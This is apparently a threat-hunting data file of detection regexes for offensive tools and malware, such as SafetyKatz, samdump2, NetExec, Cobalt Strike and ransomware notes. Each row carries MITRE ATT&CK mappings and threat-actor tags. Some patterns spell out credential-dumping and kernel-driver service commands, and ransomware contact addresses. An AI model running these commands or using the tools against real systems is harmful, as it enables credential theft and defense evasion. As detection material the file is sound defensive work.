"*safetykatz.txt*",".{0,1000}safetykatz\.txt.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57877"
"*SafetyKatzManager*",".{0,1000}SafetyKatzManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57878"
"*SafetyKatz-master*",".{0,1000}SafetyKatz\-master.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","APT39","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","N/A","10","10","1257","247","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z","57879"
"*sahadnk72/jecretz*",".{0,1000}sahadnk72\/jecretz.{0,1000}","offensive_tool_keyword","jecretz","Jira Secret Hunter - Helps you find credentials and sensitive contents in Jira tickets","T1552 - T1114 - T1119 - T1070","TA0006 - TA0009 - TA0005","N/A","Scattered Spider*","Discovery","https://github.com/sahadnk72/jecretz","1","1","N/A","N/A","7","1","43","9","2022-12-08T10:00:11Z","2020-05-25T14:40:28Z","57880"
"*sAINT*launch4j.tar.xz*",".{0,1000}sAINT.{0,1000}launch4j\.tar\.xz.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","57881"
"*sAINT\lib\activation.jar*",".{0,1000}sAINT\\lib\\activation\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","57882"
"*saint-1.0-jar-with-dependencies.exe*",".{0,1000}saint\-1\.0\-jar\-with\-dependencies\.exe.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","57883"
"*saint-1.0-jar-with-dependencies.jar*",".{0,1000}saint\-1\.0\-jar\-with\-dependencies\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","57884"
"*Salsa-tools*",".{0,1000}Salsa\-tools.{0,1000}","offensive_tool_keyword","Salsa-tools","Salsa Tools - An AV-Safe Reverse Shell dipped on bellota sauce Salsa Tools is a collection of three different tools that combined. allows you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for its execution. In order to avoid the latest detection techniques (AMSI). most of the components were initially written on C#. Salsa Tools was publicly released by Luis Vacas during his Talk Inmersin en la explotacin tiene rima which took place during h-c0n in 9th February 2019","T1027 - T1036 - T1059 - T1071 - T1073 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/Hackplayers/Salsa-tools","1","0","N/A","N/A","N/A","10","580","131","2020-01-31T22:41:35Z","2019-02-04T21:31:28Z","57885"
"*--sam --dump-method cmd*",".{0,1000}\-\-sam\s\-\-dump\-method\scmd.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","57886"
"*--sam --dump-method powershell*",".{0,1000}\-\-sam\s\-\-dump\-method\spowershell.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","57887"
"*SAM hashes extraction failed: *",".{0,1000}SAM\shashes\sextraction\sfailed\:\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","57888"
"*SAM hashes extraction for user * failed*",".{0,1000}SAM\shashes\sextraction\sfor\suser\s.{0,1000}\sfailed.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","57889"
"*SAM\*-SAMHashes.txt*",".{0,1000}SAM\\.{0,1000}\-SAMHashes\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","57890"
"*SAM\*-SAMHashes.txt*",".{0,1000}SAM\\.{0,1000}\-SAMHashes\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","57891"
"*SAM\.Sam-Full.txt*",".{0,1000}SAM\\\.Sam\-Full\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","57892"
"*sam_the_admin.py*",".{0,1000}sam_the_admin\.py.{0,1000}","offensive_tool_keyword","sam-the-admin","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1208 - T1218.005 - T1055.002","TA0006 - TA0007 - TA0008","N/A","N/A","Exploitation tool","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","0","N/A","N/A","N/A","10","1012","193","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z","57893"
"*SamAdduser.exe*",".{0,1000}SamAdduser\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/lengjibo/NetUser","1","1","N/A","N/A","10","10","420","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z","57894"
"*sambaPipe.py*",".{0,1000}sambaPipe\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","57895"
"*samdump *","samdump\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57896"
"*samdump(bearer, commands*",".{0,1000}samdump\(bearer,\scommands.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","57897"
"*samdump.exe*",".{0,1000}samdump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","57898"
"*samdump.py*",".{0,1000}samdump\.py.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","57899"
"*samdump.zip*",".{0,1000}samdump\.zip.{0,1000}","offensive_tool_keyword","samdump","Dumping sam","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","N/A","1","4","1","2024-06-27T09:35:42Z","2023-04-16T01:49:12Z","57900"
"*samdump2 *",".{0,1000}samdump2\s.{0,1000}","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","Black Basta","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","N/A","10","6","N/A","N/A","N/A","N/A","57901"
"*samdump2 SYSTEM SAM > *",".{0,1000}samdump2\sSYSTEM\sSAM\s\>\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57902"
"*samdump2 SYSTEM SAM*",".{0,1000}samdump2\sSYSTEM\sSAM.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","57903"
"*samdump2.c*",".{0,1000}samdump2\.c.{0,1000}","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","Black Basta","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","N/A","10","6","N/A","N/A","N/A","N/A","57904"
"*sampasswd -*",".{0,1000}sampasswd\s\-.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57917"
"*sample_brc4.json*",".{0,1000}sample_brc4\.json.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","57918"
"*sample_files/passwd*",".{0,1000}sample_files\/passwd.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","57919"
"*samr_##*",".{0,1000}samr_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","57920"
"*samratashok/nishang*",".{0,1000}samratashok\/nishang.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","57921"
"*samratashok/nishang*",".{0,1000}samratashok\/nishang.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","57922"
"*samrdump.py*",".{0,1000}samrdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","57923"
"*samunlock -*",".{0,1000}samunlock\s\-.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57924"
"*samusrgrp -a *",".{0,1000}samusrgrp\s\-a\s.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57925"
"*samusrgrp -r *",".{0,1000}samusrgrp\s\-r\s.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57926"
"*Sandbox detected - Filename changed :( *",".{0,1000}Sandbox\sdetected\s\-\sFilename\schanged\s\:\(\s.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","57928"
"*sandboxevasion.py*",".{0,1000}sandboxevasion\.py.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105  -  T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","N/A","10","10","609","139","2024-07-18T10:16:19Z","2022-01-02T22:03:10Z","57929"
"*Sandboxie detected!!!*",".{0,1000}Sandboxie\sdetected!!!.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","57930"
"*sandeshyadavm46@gmail.com*",".{0,1000}sandeshyadavm46\@gmail\.com.{0,1000}","offensive_tool_keyword","pastehakk","perform clipboard poisoning or paste jacking attack","T1115","T0001 - T0002 - T0005","N/A","N/A","Phishing","https://github.com/3xploitGuy/pastehakk","1","0","#linux #email","N/A","7","1","56","10","2020-06-22T01:17:53Z","2020-06-17T19:32:24Z","57931"
"*santat7kpllt6iyvqbr7q4amdv6dzrh6paatvyrzl7ry3zm72zigf4ad.onion*",".{0,1000}santat7kpllt6iyvqbr7q4amdv6dzrh6paatvyrzl7ry3zm72zigf4ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","57933"
"*SAP_GW_RCE_exploit*",".{0,1000}SAP_GW_RCE_exploit.{0,1000}","offensive_tool_keyword","SAP_GW_RCE_exploit","This PoC exploits an ACL misconfiguration in the SAP Gateway (port 33xx) that leads to a Remote Command Execution (RCE).SAPanonGWv1.py is the first version of the exploit based on raw packets sent. It does not require any additional modules (Run and Pwn!) SAPanonGWv2.py is the second version of the exploit based on the pysap library","T1078 - T1046 - T1201 - T1021","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tool","https://github.com/chipik/SAP_GW_RCE_exploit","1","0","N/A","N/A","N/A","2","151","45","2020-09-07T13:46:04Z","2019-03-14T13:52:00Z","57934"
"*sap2john.pl*",".{0,1000}sap2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","57935"
"*sap3r-encrypthub/encrypthub*",".{0,1000}sap3r\-encrypthub\/encrypthub.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","1","N/A","N/A","10","7","N/A","N/A","N/A","N/A","57936"
"*SARAH.BARRICK@PROTONMAIL.COM*",".{0,1000}SARAH\.BARRICK\@PROTONMAIL\.COM.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","57937"
"*SauronEye.exe*",".{0,1000}SauronEye\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","57938"
"*save the Fernet encryption/decryption key *",".{0,1000}save\sthe\sFernet\sencryption\/decryption\skey\s.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","57939"
"*saycheese-master.zip*",".{0,1000}saycheese\-master\.zip.{0,1000}","offensive_tool_keyword","saycheese","Grab target's webcam shots by link","T1213 - T1071 - T1102 - T1123 - T1185 - T1200","TA0001 - TA0005 - TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/hangetzzu/saycheese","1","1","N/A","N/A","9","10","1175","962","2024-06-18T23:39:41Z","2019-04-29T04:07:00Z","57940"
"*sc create dellserv binPath=C:\dbutil_2_3.sys type=kernel*",".{0,1000}sc\screate\sdellserv\sbinPath\=C\:\\dbutil_2_3\.sys\stype\=kernel.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#servicename","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","57953"
"*sc create plumber*warpzoneclient*",".{0,1000}sc\screate\splumber.{0,1000}warpzoneclient.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","57954"
"*sc create Terminator *.sys*",".{0,1000}sc\screate\sTerminator\s.{0,1000}\.sys.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mertdas/SharpTerminator","1","0","N/A","N/A","10","4","341","66","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z","57957"
"*sc delete plumber*",".{0,1000}sc\sdelete\splumber.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","58022"
